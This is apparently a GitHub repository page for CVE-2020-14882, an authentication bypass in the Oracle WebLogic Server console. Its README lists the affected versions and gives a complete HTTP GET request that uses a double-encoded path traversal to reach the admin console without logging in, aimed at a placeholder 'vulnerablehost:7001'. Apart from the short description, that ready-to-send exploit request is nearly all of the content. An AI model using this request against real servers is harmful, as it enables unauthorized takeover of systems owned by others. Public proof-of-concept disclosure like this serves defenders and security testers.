Skip to content
/ CVE-2020-14882 Public

[CVE-2020-14882] Oracle WebLogic Server Authentication Bypass

3 stars 1 fork Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

murataydemir/CVE-2020-14882

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
README.md
README.md
 
 
poc.png
poc.png
 
 

Repository files navigation

[CVE-2020-14882] Oracle WebLogic Server Authentication Bypass

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server

GET /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: vulnerablehost:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,zh;q=0.9
Connection: close

Image of PoC

About

[CVE-2020-14882] Oracle WebLogic Server Authentication Bypass

Resources

Readme
Activity

Stars

3 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published